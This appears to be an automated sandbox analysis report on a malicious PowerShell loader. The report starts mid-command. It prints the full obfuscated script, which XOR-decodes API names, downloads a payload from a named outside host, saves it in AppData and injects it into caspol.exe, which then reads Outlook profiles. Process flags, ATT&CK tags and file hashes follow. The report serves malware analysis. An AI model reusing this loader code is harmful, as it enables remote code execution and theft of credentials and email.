Ne'De0Sa4Fu6Ja4Up4Mo5fo4Je3Be4FaFSj4PaCUn4ReFKi5Da5Ci5Ny2Un0TaEUu6De4Re4Re5No4Ge6Ak4Sp9Te4HuEqi4Ma5Pr6KiDEf4Un5na5pl4Do4Op8St4WiFEn4Ca4Xy0Se8Kl0Ca4Ca6Va3dr4DiFsp4Un3Hy4UnBSk5Di4An4Te1Fo4Co9An4DrCSu1be2Be0ViCVi0Pl0Ke0Ka4un6Sa3Du4UlFGy4Va3Be4LnBfj5En4Su4Co1su4re9Bu4ToCTh1Fj3Bl0PsCNo0Lu0Pr0Ud4An7So2Qu4MuFFo4FiDWe4Sp5Ga4FiFTh5No3Un5Ni5Bl4Ch4Ur4At6Ja5Op2At0RaCDi0Si0Co0Un4So7Me4Vi4Mb5Be5Im4Be5Pr2fl4Di1Un0St9Ge0suEsk7Sj3Da4Ni5No5Is4oi6Kr9Tr4GeDFe5Dr0Su4LaCDr4Ae5Al4UnDLn4De5Pa4TiELu5Sa4Ni4Wi1Tr5So4Sh4kv9Fr4UnFSm4UnEMo6Un6Pr4ReCBa4Pr1Ca4Hu7Ma5Op3Sj0Pd8Is0Na4Ti6Un2Mo4ChFMe4RhCEl5In4Co4Br5Ob4SpEZa4Ul4Po4Jo5Su1In7Ca0Kr9Kl'Ho;Lu&sv(Ud`$SkCDeoexcFekRotBlaPriHalBl7mi)Sy Ma`$UpAstfMasSkmDieUnlBo4Da;Un`$GoAFofPrsFrmCueUdlTs5He ka=ru HyFHerLuaRenPekbeoScsistHueDemPe0Te2St Fe'St5Un2Ud4Ph5Fe5Av4Ti5Re5sk5pr2Ga4BlEsv0Si0Su0Wo4Do6ba4De4Hu5Ca4me3An4DrFUn4ArCGo4FjFDo5Ga5Su5No2Zi0PaECh6Hj3fl5Ki2Kn4On5Li4En1Me5Ni4Fo4Mo5Wi7Br4Mo5Ru9fi5De0Ga4Me5Su0Po8Or0ki9La'To;Ag&Un(Pa`$PrCCooOucNokButNoaChiTrlGh7Bl)Kl Ov`$TrAPdfBrsGrmOkerelVo5ru Ar Fo Br;Tr}Rg`$CoFKorFeeDimPrdMepti Ba=La LaFSerReaPenUlkSnoRosKetAmecrmOu0Co2Re Su'Ur4TrBEr4Fa5Ti5Aa2Is4UbEHo4No5Pu4SwCme1St3Un1Su2In'Er;De`$MiAkefHssSpmPreAtlJi6fo Ba=sa IlFDyrDiaUnnSkkCloSpsBetSpeVemOr0Fo2Co Fi'Mi0Un4Sa4Ne1Ce4ReCAw4AnBVa4Ud1Ar4UnCAn4Tr9Le4ArEAs0En0Be1MaDTi0Kn0Ka7UnBSt7Me3Ka5Eo9Se5Te3Ae5En4Ko4St5Gy4ThDHu0TeEga7Ko2Fo5Hj5Co4ZeESu5Sh4Su4Sp9sm4miDSt4Pa5St0PaESk6Ni9Po4isEMa5Oz4Su4Co5En5Se2Id4NiFPa5Hj0Eu7Ma3Po4En5co5Fe2Fu5Ca6Me4Mo9Ba4Sp3Ta4Be5Pu5Sj3Co0HoEPh6beDBy4Ns1Ev5Ra2Me5Un3di4Di8Kr4Vi1Di4afCRr7teDUn1AnAAm1HaAAs6Ma7Ne4un5No5St4Am6Fo4Al4An5Fo4UnCNo4va5In4Re7Ud4Fe1Pa5Pr4Gl4In5Mo6Bo6In4WiFDi5St2Sc6Ru6Sk5Af5Kl4DyESk4Dy3sl5Un4We4So9fr4PrFOv4RiENr7Bo0Ho4CaFOd4Sk9Ki4CaESt5Ko4ag4Fi5No5Ar2Da0Fi8Bi0Im8Re4Br6ja4taBBl5Fs0Ti0ho0En0In4wo6Se6Ma5Sk2Fe4Un5St4NuDfi4Du4Be5Af0Sp0ca0Ha0Aa4Ns6Pe3Ir4SeFLe4Ly3Su4SiBRe5Sh4Te4Re1Bi4Wi9Du4EuCFr1Sp4In0Hy9Ci0AtCWi0no0Im0Hs8Br6Un7Va6Tr4Ar7Co4Da0Sp0mu6Tu0Di0Gr8Fo7ShBbr6fo9Ba4PuEDi5Dr4Ek7Er0Co5Tj4He5Ne2lo7AdDag0ViCun0Be0Ge7LoBNo7Py5Fa6No9be4LiESa5Ec4Pa1Kn3br1Un2Ca7DyDUd0ScCDi0Am0Kr7EaBCo7In5He6Fo9Un4InEVe5To4Ch1By3An1la2Ju7GeDSt0DoCMi0Ef0Sa7GaBEn7To5Go6Kr9Sy4LaEUv5Pl4Te1Ar3En1ge2Ll7EpDFu0re9le0Bl0Un0Tr8be7SkBUn6Sn9Hu4SkEOp5He4Su7Cr0Ch5Fe4Ei5In2Pr7AfDVi0En9hj0Sl9Ba0Ho9Sd'Ae;Ku&Vi(pa`$anCFooPucShkCotOmaAsiTelBo7Ud)ac Om`$UnACafLysApmIdeBalEu6In;Sk`$LuRCoeApaCucEr Ca=An SifTakDopSk Li`$AvCEloBecOskEltSeaCoiFllDa5Pa na`$PrCThoUncSmkEptCraGeiRilSn6Pu;Co`$ReAHofRusDvmCoeOclSe7ba Fi=St TrFRerOvaPhnDukVaoResSntWaeDemAr0In2Co Lu'Ch0mo4Ci6VeEOu4de9Ha5Fo4Ka5Be2Lu4SyFIn4AiDSu4Su5Un5Sk4Gr1Ac3Ti0co0Re1HyDDo0Ex0Re0Ti4Pr4Ny1Be4phCUn4BiBDe4No1Wa4InCCo4Fu9Se4frEHa0AnETr6Ka9Me4ArEUf5Sa6Ba4StFFi4KrBBy4St5No0De8Su7PrBec6Re9Un4KoEPo5Li4Af7Jo0Gl5Pr4Sv5Et2An7EpDWa1RuAHe1FrABd7FoAUn4Ti5Su5Fl2Or4ErFSl0VeCAk0Te0Gr1Wh6Bl1Th4Du1Re8Ba0UdCMi0fo0Ga1Re0Ov5Fr8Ud1Bu3Bl1Ki0St1Sl0Mi1Uo0Co0KaCLy0Pr0No1Ul0He5fo8Fu1Cy4Hy1Ch0Se0En9Ha'St;Ge&Bo(Ek`$MaCinoBncAnkCotKoaMaicllAn7Im)Co Ru`$ShANafBlsepmPaecolCl7Fa;ha`$MiAHefDasMimReeAnlAf8Sk Es=Pa DeFPrrRhaSknAnkOpoInsTitDuebimHe0Dk2El Tz'To0Be4Gi6MeBSg4FjEVa4Ah2Af4Ho5ha5Se3Me0Id0Me1TuDGg0Ti0Bi0Fr4Ve4Gl1Mu4GaCGn4PrBUd4Up1Ak4DeCOv4Ve9re4DiEWi0SlECh6Me9Ov4GrEHe5Pa6Ek4TcFGe4LoBPa4Sp5Sj0De8Gr7BeBVa6Tr9Su4skECo5Op4Al7De0Bl5po4ba5He2Ti7obDBi1LaAMo1PrACu7TrAUg4Ak5Tr5Sk2Ac4DiFAv0SuCda0Pa0An1Tr8kl1In1Al1Pa1Ti1Gr1Sl1Gl7Ap1Ne1ro1Wa8oa1Pe4in0PhCto0Re0Dy1Bo0Do5fo8He1ud3Au1he0Ln1Ud0Un1na0Ce0BlCAk0Ma0Ho1Da0He5Ar8Im1Be4Mo0Gr9Po'Ma;Af&Ma(Su`$DaCFjoTocPrkTrtOnaDiiKvlAd7Sp)Im gn`$AmAVafEqsTrmAaeTalHe8Aa;He`$HaFOprSeaMenFoksooRessatCheBamBi0Sa1Ar Ka=De Te'PrhUntTrtRopEx:Sm/Bo/RtmTreOdgDioBaoFukInbRipEnnInqAu.MacUrfGr/BojAfeSvrPenCehErano.FidDisKapCh'Ba;To`$SyFTorloaUnnInkfoosasKrtMaetomTr0Re0fo Gg=Fr PaFOprBeaDinBekStoSusKetDeevamBy0Uf2Ca Br'Re0Ca4Po7Ex6Ta4KlFSl5Fl2Ps5Di4So4so5Cr5Ko2fo0ta0In1svDHu0Sa0He0Sk8Lv6SqEWa4Ti5Re5Ko7Un0UnDTo6DoFSt4Gi2Re4ExATn4Ef5Di4Tr3La5Be4sn0Ha0Do6InEGo4Fo5An5Ca4Ha0TiEAn7En7Fi4Un5Ma4Re2Fa6To3Br4ElCKa4Di9Te4si5Ja4FoEAf5Te4Go0Ny9Ho0StEMo6Al4Ob4DaFOp5Le7Fl4PoEBr4BoCMa4SeFIb4Fu1Fi4Va4So7Sa3Pl5Wi4Ad5Fr2Ou4Co9Sh4acESp4Un7Dr0St8Ba0Mu4No6Py6Dr5Ps2Ov4bl1Ve4ToEUd4shBPr4MaFMi5Bo3Mo5Mi4So4Tr5Ko4ReDIn1Dy0St1Ba1Om0Pl9bo'Gr;In`$ExAFofResSemMoeTelSn8On Un=Ab BuFCarHaaManJokSoofisbrtReeBemKe0Fe2De By'Re0St4Sk6StECo4Fj9No5Ba4Pa5Af2St4StFEj4saDOs4Su5Ps5Ov4St1Kr2Or1soDAf0kd4By4Pa5St4ArEJe5Ni6Kv1ElARe4Ov1ho5Ho0Wr5Ke0Pe4Kl4Pr4Re1Af5re4Fa4Di1Hu'Tr;Li&Bl(He`$UlCmaoSacBokSktLuaLoiMelTo7Fl)Br ce`$GoABrfYdsGemLyeTrlSk8Gu;St`$AfNSkiSatUnrTroEsmTaeTrtFo2Kn=Ze`$MuNBeilutplrseoApmLeeAbtUn2In+Lg'Sp\DeKAgaOmlPlkOplPluBurUnmRuaAnuSk.IndDoaSetAn'Sk;na`$buVAfoBrrSytReeprrMa=En'Ba'fi;poiRefco Ma(Is-HenMaoRetLk(niTVieInscutTh-CiPLuaKutRehgr Ma`$afNNyiDetDerHooCrmAreGatPe2Ca)De)Ru Ud{GdwGthRiiDolSueMe Va(Bl`$OvVmaoMerintSkeDrrTi Ab-SneInqUn Ev'Ca'An)Po Ru{Lr&Hi(hy`$AmCTaoGocFakUdtCoafaiFrlEr7Un)So st`$PrFRerSmaKonBikCaoFasEqtkaePlmEp0De0Sp;UnSChtMiaMirAftRo-KoSprlAmeUneLopSy Tr5Nu;Sa}ChSSeeSatFo-HaCInoScnTetFoeKrnWotSu Dr`$BrNPaiIntSyrNioInmPeeHrtta2Ra Ap`$AlVGloLurFetRseKrrMa;Su}Sn`$brVTeoUnrlgtKoenarTr fu=Ps faGSoeAntub-NoCDioTunKitMaePanRetPa sk`$heNApiSetSnrGooUdmAleSltOv2Di;Li`$UnAObfAlsChmAfeWolVo9Is Fo=Ma UnFUnrFyarenTikNeoKesRatKoeFomHe0Oc2Dr Ta'Vi0Ud4If6co1Ti4Me6Af5Ud3Fe4ReDSu4Vu5Cu4ChCAp0Ab0Be1UnDBu0Gl0Re7DrBUn7En3En5No9Op5el3So5Ar4Or4Av5Er4taDAf0FuEGe6No3Pa4TyFBy4FuEAn5Ry6ka4Tu5Pa5Ru2Ca5Sc4Re7TvDSy1MeADe1HyAPe6Co6Bo5Sa2Sl4WiFTi4HoDNe6Ap2co4Ar1Sa5Un3Zo4An5Sk1Ka6Co1My4Mo7Fu3Me5Ac4Sl5Tr2Ox4Cu9Br4UdESt4Sq7li0Am8Co0Vi4Me7Sm6Id4SlFCi5Gr2Di5He4Af4Hy5Se5ba2Pa0Ti9St'Ou;Me&Sp(Do`$MaCProFocTuksetStaBeiDelSt7an)Ha st`$CyAMofAtsTemTeeAnlKi9Ta;To`$FrVtaoSyrMitSeeParSp0Sn Ca=Sl KrFBorZiaApnVakCooChsArtQueJomTr0Me2Hy Mo'Fr7BoBma7Pa3No5Ka9Gg5Fo3Fo5Sa4Re4Fr5Dk4AsDPr0BaEKo7Ta2Om5Al5ty4PhEMu5Bo4Bu4St9No4TrDGa4On5Ak0DeEKo6Re9Tr4UnEDr5Ta4Ve4We5Dr5He2Fu4SuFSp5Ri0sa7Er3Fl4Sk5Sp5Ca2Pa5Sy6Ba4Zi9st4Un3Ou4Li5Ch5Re3Sa0NoEAg6PaDHv4Fy1He5Ma2Sa5Ou3Ru4Wo8Fi4ic1Bu4PoCSt7OpDWi1UnASt1DrAMo6Ch3lo4TrFRe5En0St5Po9Pl0Mi8Po0Sp4Mo6Sm1Pr4no6Ud5Tv3Sp4ReDPo4Al5Sp4DiCMn0GuCSt0Ba0Re1wh0An0KeCPi0fo0Ty0Un0St0Hu4Kn6OmEPr4Ty9ci5Fr4An5An2In4HeFNa4BeDSl4Un5Pi5st4pr1Fo3Sk0SvCNo0Ln0Na1Fo6Bu1Ko4Ti1ur8St0Fe9Sm'Gy;De&Ud(Co`$GrCChoFocSpkPhtSkaPhiBelAf7Co)Pr Je`$SpVPloskrFitReePlrIl0fr;Au`$FoLAnaTbgTotPahReiBancagAsfJvaEr=Fo`$SaAInfHosBamPieLolPr.FycSkoEkuBlnAmtGi-fi6ki4Re8Su;Do`$KiVDeoVorBitReeBeram1Po Me=Kn StFBlrHyaIsnTykFaoBasTatPheAnmPe0In2Ne Di'Ta7UdBZn7Wi3Co5Su9Pe5Un3Hj5Ar4Bo4He5In4NeDNo0CuEAf7Fl2Fo5Po5Ha4AlEUn5De4Ba4Ps9St4AuDfe4An5Re0StEJe6lg9Ba4MoEPe5pa4Mo4Wo5pr5Re2Ak4neFMa5su0Tj7Sk3sk4Ga5Di5Su2Pi5Ur6Sk4St9Sl4En3Ar4Rd5Ga5Sm3Ge0GrETr6DrDIn4Ef1Sc5Cr2Dr5De3No4De8Ar4Pr1Sa4PlCHa7SoDTr1AlACi1MiASp6Dm3No4ThFPr5Tr0Sc5Lo9Gr0Fo8Ne0Gr4Ja6Fo1Ip4Ma6tr5Cl3Un4AaDLs4Ru5Ra4BoCre0AbCTi0An0Ur1Fo6Pr1sp4Af1No8te0VeCBu0Ta0Bo0Sl4Co6TrBPo4zoEAf4Ko2Mi4Co5Vo5Fo3Sm0AlCMi0Cr0Sl0Ba4Pl6soCTr4Wa1Ge4Sn7Fo5An4me4Ki8Ar4Ok9St4otEDo4No7Sh4In6He4Ko1Ef0Ba9Sk'Mo;Pa&Rd(Ha`$MeCCooBecRokKutFoaGniJelre7Wh)Re Os`$FuValoAnrPatHeeScrAm1Em;Bu`$PrVOvoHerCotLueBorEn2At Ma=Ta FlFKlrBgaShnBekMeoSusGetFoehymSt0pr2Ou Be'Be0No4Wh7er3Ba5He9co4EnDPe5Ry0Bi4No8Ko4KoFal4BeEMo4Tr9at5Re3fo0Co0Il1OmDKa0Ad0Ph7DiBKl7Pr3ve5He9Cr5Fo3Re5Sl4ku4Co5Fr4DiDSk0suEMe7Kv2Im5Ma5Mm4SyEAn5Gs4Sp4Lo9Fl4AnDlo4Ad5Op0seEBr6Ge9va4KeEDi5Ca4Ly4Tr5Fr5Fr2Ye4xeFRe5Ef0Se7Aa3tu4An5Ov5Su2Jo5Un6Fe4St9cr4An3Ud4In5Li5Jo3Vi0boEBa6TrDAk4En1Pe5Pr2an5In3Ch4He8Be4fl1Ya4stCDe7BrDre1SkASo1BrAen6Ta7Co4Zo5Sk5He4ti6So4No4Gu5Ja4CoCSe4St5Th4Gu7Ma4Di1Bi5St4Gl4He5Pr6In6Ep4MoFPi5Pr2Un6Bu6Ca5Ku5Th4UpEFy4Te3Af5Af4Ap4Ta9Fo4KeFkn4InEZo7Ph0Gi4UnFPl4Un9Up4VoESe5Me4Sp4Pa5tr5Am2Re0Tr8Fu0Ta8he4Li6Ty4HjBAu5Sl0No0Br0Bi0Fr4Li6Th3fn4St1Sl5Sh0Pi4Ge1ra4El3ar5Fr4Ov4Pr9Ga5ro3Se4BoETh0Ly0Ov0Bo4Dn6chBDe4sp9Vi4KoBSe4GrBWi4Co5He5La2Mi4ScEpo4Se5Af5Et3Vi0Um9De0SuCAv0In0Tr0Ma8Me6Im7bi6Tr4Ba7Be4No0Ke0Ek6Fl0Ud0Ra8sp7tuBGe6le9Tr4PlEPr5Bl4Fo7Na0Fi5Wa4Ex5Sy2Fo7ReDSu0afCSt0De0Op7DiBPa6Un9Am4FoEOp5Br4Si7De0Da5Br4Or5Te2Va7MiDLa0UmCAl0Su0De7RaBUd6Ta9Un4BoEAf5Fo4Hu7Fi0Ku5Ak4Se5An2Po7VeDNu0SpCDe0Se0Si7DrBPr6Tr9Dy4DrESt5Fu4Co7Vs0Kr5Be4Me5tr2Sp7KuDRa0SaCDe0Un0Sa7RyBCo6Be9Sk4alEve5Ka4Fa7Ba0De5Sc4Re5Sk2Ot7EfDda0Bl9Vu0Ki0Ly0Ge8Tr7udBJu6Sk9Ha4IsEDa5An4In7Ov0Un5Tr4Co5Mi2Ba7DiDIn0Ta9Mo0tr9Po0Ar9ta'Pa;Sa&Ab(Mo`$BuCTaoTacAfkDetKkaSuiVglTa7Sl)Se Bl`$BeVphoRerTatAperurSg2Mo;be`$StVHioAnrDotViePerCa3Su Ex=st SpFForCoaIsnKikProBosVatHeeDamSt0Be2Na Vi'Ha0Nu4Lu7ko3Ar5Sp9Re4HaDTi5Re0Va4Eu8Ma4ApFSi4DaEVi4Su9Sy5Ef3Ne0EbEBr6Lo9Ne4EsEKi5Sa6we4SvFCo4JaBFo4Me5Dr0Fo8Co0sp4Sm6VdEDi4Sn9Pe5St4Gr5Ya2No4ReFSe4suDSy4Ni5Va5Sh4Sk1St3Su0piCya0Kv4Da6RhBmi4PrEGa4Va2Dy4Re5Au5Po3Ha0MeCSl0Rr4Ac7Bo2Re4St5Un4to1Le4Ko3Ha0BeCEc1Ke0Sl0SmCTi1El0Kr0Pe9Pr'To;Kn&bl(Po`$ScCBroMicEnkAntFiaMiiNolNe7No)Sk Sh`$AtVveoKorPatUneSurAn3As#Jo;""";Function Vorter9 ([String]$Undevoutly) { For($Unbettere197=2; $Unbettere197 -lt $Undevoutly.Length-1; $Unbettere197+=(2+1)){$Frankostem = $Frankostem + $Undevoutly.Substring($Unbettere197, 1)}; $Frankostem;}$Cheriecate0 = Vorter9 'LiIPeEGuXVi ';$Cheriecate1= Vorter9 $Svinekd;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Cheriecate1 ;}else{&$Cheriecate0 $Cheriecate1;}"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1768
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Frankostem02 { param([String]$Undevoutly); $Ngte = ''; Write-Host $Ngte; Write-Host $Ngte; Write-Host $Ngte; $Landgangen = New-Object byte[] ($Undevoutly.Length / 2); For($Unbettere197=0; $Unbettere197 -lt $Undevoutly.Length; $Unbettere197+=2){ $Landgangen[$Unbettere197/2] = [convert]::ToByte($Undevoutly.Substring($Unbettere197, 2), 16); $Landgangen[$Unbettere197/2] = ($Landgangen[$Unbettere197/2] -bxor 32); } [String][System.Text.Encoding]::ASCII.GetString($Landgangen);}$Boltende0=Frankostem02 '73595354454D0E444C4C';$Boltende1=Frankostem02 '6D4943524F534F46540E77494E13120E754E534146456E41544956456D4554484F4453';$Boltende2=Frankostem02 '67455470524F4361444452455353';$Boltende3=Frankostem02 '73595354454D0E72554E54494D450E694E5445524F5073455256494345530E68414E444C45724546';$Boltende4=Frankostem02 '535452494E47';$Boltende5=Frankostem02 '6745546D4F44554C4568414E444C45';$Boltende6=Frankostem02 '72747350454349414C6E414D450C006849444562597349470C007055424C4943';$Boltende7=Frankostem02 '72554E54494D450C006D414E41474544';$Boltende8=Frankostem02 '7245464C454354454464454C4547415445';$Boltende9=Frankostem02 '694E6D454D4F52596D4F44554C45';$Cocktail0=Frankostem02 '6D5964454C454741544574595045';$Cocktail1=Frankostem02 '634C4153530C007055424C49430C007345414C45440C00614E5349634C4153530C006155544F634C415353';$Cocktail2=Frankostem02 '694E564F4B45';$Cocktail3=Frankostem02 '7055424C49430C006849444562597349470C006E4557734C4F540C007649525455414C';$Cocktail4=Frankostem02 '7649525455414C614C4C4F43';$Cocktail5=Frankostem02 '4E54444C4C';$Cocktail6=Frankostem02 '6E5470524F544543547649525455414C6D454D4F5259';$Cocktail7=Frankostem02 '696578';$Cocktail8=Frankostem02 '7C';$Capactisn=Frankostem02 '757365721312';$Kikkernes=Frankostem02 '63414C4C77494E444F5770524F4361';function fkp {Param ($Indis, $Ciselre) ;$Afsmel0 =Frankostem02 '046B4C494E474553001D00087B615050644F4D41494E7D1A1A63555252454E54644F4D41494E0E674554615353454D424C4945530809005C0077484552450D6F424A454354005B00047F0E674C4F42414C615353454D424C596341434845000D614E4400047F0E6C4F434154494F4E0E73504C49540804634F434B5441494C18097B0D117D0E655155414C530804624F4C54454E44451009005D090E674554745950450804624F4C54454E44451109';&($Cocktail7) $Afsmel0;$Afsmel5 = Frankostem02 '04735452495050001D00046B4C494E4745530E6745546D4554484F440804624F4C54454E4445120C007B745950457B7D7D00600804624F4C54454E4445130C0004624F4C54454E4445140909';&($Cocktail7) $Afsmel5;$Afsmel1 = Frankostem02 '52455455524E00047354524950500E694E564F4B4508044E554C4C0C0060087B73595354454D0E72554E54494D450E694E5445524F5073455256494345530E68414E444C457245467D086E45570D6F424A4543540073595354454D0E72554E54494D450E694E5445524F5073455256494345530E68414E444C4572454608086E45570D6F424A45435400694E54705452090C0008046B4C494E4745530E6745546D4554484F440804624F4C54454E44451509090E694E564F4B4508044E554C4C0C00600804694E444953090909090C0004634953454C52450909';&($Cocktail7) $Afsmel1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Tetra,[Parameter(Position = 1)] [Type] $Romeosudfr = [Void]);$Afsmel2 = Frankostem02 '046445434F4C4F5552001D007B615050644F4D41494E7D1A1A63555252454E54644F4D41494E0E644546494E4564594E414D4943615353454D424C5908086E45570D6F424A4543540073595354454D0E7245464C454354494F4E0E615353454D424C596E414D450804624F4C54454E44451809090C007B73595354454D0E7245464C454354494F4E0E654D49540E615353454D424C596255494C4445526143434553537D1A1A72554E090E644546494E4564594E414D49436D4F44554C450804624F4C54454E4445190C000446414C5345090E644546494E45745950450804634F434B5441494C100C0004634F434B5441494C110C007B73595354454D0E6D554C54494341535464454C45474154457D09';&($Cocktail7) $Afsmel2;$Afsmel3 = Frankostem02 '046445434F4C4F55520E644546494E45634F4E5354525543544F520804624F4C54454E4445160C007B73595354454D0E7245464C454354494F4E0E63414C4C494E47634F4E56454E54494F4E537D1A1A7354414E444152440C00047445545241090E734554694D504C454D454E544154494F4E664C4147530804624F4C54454E44451709';&($Cocktail7) $Afsmel3;$Afsmel4 = Frankostem02 '046445434F4C4F55520E644546494E456D4554484F440804634F434B5441494C120C0004634F434B5441494C130C0004724F4D454F53554446520C00047445545241090E734554694D504C454D454E544154494F4E664C4147530804624F4C54454E44451709';&($Cocktail7) $Afsmel4;$Afsmel5 = Frankostem02 '52455455524E00046445434F4C4F55520E635245415445745950450809';&($Cocktail7) $Afsmel5 ;}$Fremdp = Frankostem02 '4B45524E454C1312';$Afsmel6 = Frankostem02 '04414C4B414C494E001D007B73595354454D0E72554E54494D450E694E5445524F5073455256494345530E6D41525348414C7D1A1A67455464454C4547415445664F5266554E4354494F4E704F494E5445520808464B5000046652454D44500004634F434B5441494C14090C00086764740060087B694E547054527D0C007B75694E5413127D0C007B75694E5413127D0C007B75694E5413127D0900087B694E547054527D090909';&($Cocktail7) $Afsmel6;$Reac = fkp $Cocktail5 $Cocktail6;$Afsmel7 = Frankostem02 '046E4954524F4D455413001D0004414C4B414C494E0E694E564F4B45087B694E547054527D1A1A7A45524F0C001614180C001058131010100C001058141009';&($Cocktail7) $Afsmel7;$Afsmel8 = Frankostem02 '046B4E424553001D0004414C4B414C494E0E694E564F4B45087B694E547054527D1A1A7A45524F0C0018111111171118140C001058131010100C0010581409';&($Cocktail7) $Afsmel8;$Frankostem01 = 'http://megookbpnq.cf/jernha.dsp';$Frankostem00 = Frankostem02 '04764F52544552001D00086E45570D6F424A454354006E45540E774542634C49454E54090E644F574E4C4F4144735452494E4708046652414E4B4F5354454D101109';$Afsmel8 = Frankostem02 '046E4954524F4D4554121D04454E561A41505044415441';&($Cocktail7) $Afsmel8;$Nitromet2=$Nitromet2+'\Kalklurmau.dat';$Vorter='';if (-not(Test-Path $Nitromet2)) {while ($Vorter -eq '') {&($Cocktail7) $Frankostem00;Start-Sleep 5;}Set-Content $Nitromet2 $Vorter;}$Vorter = Get-Content $Nitromet2;$Afsmel9 = Frankostem02 '046146534D454C001D007B73595354454D0E634F4E564552547D1A1A66524F4D624153451614735452494E470804764F5254455209';&($Cocktail7) $Afsmel9;$Vorter0 = Frankostem02 '7B73595354454D0E72554E54494D450E694E5445524F5073455256494345530E6D41525348414C7D1A1A634F505908046146534D454C0C00100C0000046E4954524F4D4554130C0016141809';&($Cocktail7) $Vorter0;$Lagthingfa=$Afsmel.count-648;$Vorter1 = Frankostem02 '7B73595354454D0E72554E54494D450E694E5445524F5073455256494345530E6D41525348414C7D1A1A634F505908046146534D454C0C001614180C00046B4E4245530C00046C41475448494E47464109';&($Cocktail7) $Vorter1;$Vorter2 = Frankostem02 '0473594D50484F4E4953001D007B73595354454D0E72554E54494D450E694E5445524F5073455256494345530E6D41525348414C7D1A1A67455464454C4547415445664F5266554E4354494F4E704F494E5445520808464B50000463415041435449534E00046B494B4B45524E4553090C00086764740060087B694E547054527D0C007B694E547054527D0C007B694E547054527D0C007B694E547054527D0C007B694E547054527D0900087B694E547054527D090909';&($Cocktail7) $Vorter2;$Vorter3 = Frankostem02 '0473594D50484F4E49530E694E564F4B4508046E4954524F4D4554130C046B4E4245530C04724541430C100C1009';&($Cocktail7) $Vorter3#"
    3⤵
    - Blocklisted process makes network request
    - Checks QEMU agent file
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1528
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
      4⤵
      Checks QEMU agent file
      Accesses Microsoft Outlook profiles
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of AdjustPrivilegeToken
      outlook_office_path
      outlook_win_path
      PID:1740

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

1

T1059

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Email Collection

1

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
e1367e7d147cdc28da1fc89f9d155174

SHA1
63782864ee650e4048e1f6c8c93630b1f0531e01

SHA256
94e4f405afed07d84d62a6e7c219007ed5d7c6d87e2f33911f17a5d54dd30d9e

SHA512
362579d39944c5339da76772db86f48ddb48a723d6c8ae9b795d44118ebde0d2e2d92dae3e1dd194d1d658aebbec9a58a412b4e08268d244fd1ac7fba084bdb9

Download Submit
memory/1528-74-0x0000000073AB0000-0x000000007405B000-memory.dmp

Filesize
5.7MB

Download
memory/1528-88-0x0000000077C50000-0x0000000077DD0000-memory.dmp

Filesize
1.5MB

Download
memory/1528-95-0x0000000077C50000-0x0000000077DD0000-memory.dmp

Filesize
1.5MB

Download
memory/1528-94-0x0000000005C00000-0x000000000A95C000-memory.dmp

Filesize
77.4MB

Download
memory/1528-86-0x0000000077C50000-0x0000000077DD0000-memory.dmp

Filesize
1.5MB

Download
memory/1528-80-0x0000000077C50000-0x0000000077DD0000-memory.dmp

Filesize
1.5MB

Download
memory/1528-79-0x0000000077C50000-0x0000000077DD0000-memory.dmp

Filesize
1.5MB

Download
memory/1528-75-0x0000000077A70000-0x0000000077C19000-memory.dmp

Filesize
1.7MB

Download
memory/1528-73-0x0000000005C00000-0x000000000A95C000-memory.dmp

Filesize
77.4MB

Download
memory/1528-72-0x0000000073AB0000-0x000000007405B000-memory.dmp

Filesize
5.7MB

Download
memory/1528-69-0x00000000766D1000-0x00000000766D3000-memory.dmp

Filesize
8KB

Download
memory/1732-62-0x00000000028D4000-0x00000000028D7000-memory.dmp

Filesize
12KB

Download
memory/1732-58-0x000007FEF3DD0000-0x000007FEF492D000-memory.dmp

Filesize
11.4MB

Download
memory/1732-59-0x00000000028D4000-0x00000000028D7000-memory.dmp

Filesize
12KB

Download
memory/1732-57-0x000007FEF4930000-0x000007FEF5353000-memory.dmp

Filesize
10.1MB

Download
memory/1732-56-0x000007FEFC2F1000-0x000007FEFC2F3000-memory.dmp

Filesize
8KB

Download
memory/1732-63-0x00000000028DB000-0x00000000028FA000-memory.dmp

Filesize
124KB

Download
memory/1740-90-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/1740-93-0x0000000000400000-0x0000000000430000-memory.dmp

Filesize
192KB

Download
memory/1740-97-0x0000000077C50000-0x0000000077DD0000-memory.dmp

Filesize
1.5MB

Download
memory/1740-82-0x0000000077A70000-0x0000000077C19000-memory.dmp

Filesize
1.7MB

Download
memory/1740-87-0x0000000077C50000-0x0000000077DD0000-memory.dmp

Filesize
1.5MB

Download
memory/1740-91-0x0000000000401000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/1740-89-0x0000000000620000-0x000000000537C000-memory.dmp

Filesize
77.4MB

Download
memory/1740-81-0x0000000000620000-0x000000000537C000-memory.dmp

Filesize
77.4MB

Download
memory/1768-67-0x000007FEF2D50000-0x000007FEF38AD000-memory.dmp

Filesize
11.4MB

Download
memory/1768-66-0x000007FEF3F90000-0x000007FEF49B3000-memory.dmp

Filesize
10.1MB

Download
memory/1768-70-0x00000000024B4000-0x00000000024B7000-memory.dmp

Filesize
12KB

Download
memory/1768-96-0x00000000024BB000-0x00000000024DA000-memory.dmp

Filesize
124KB

Download
memory/1768-71-0x00000000024BB000-0x00000000024DA000-memory.dmp
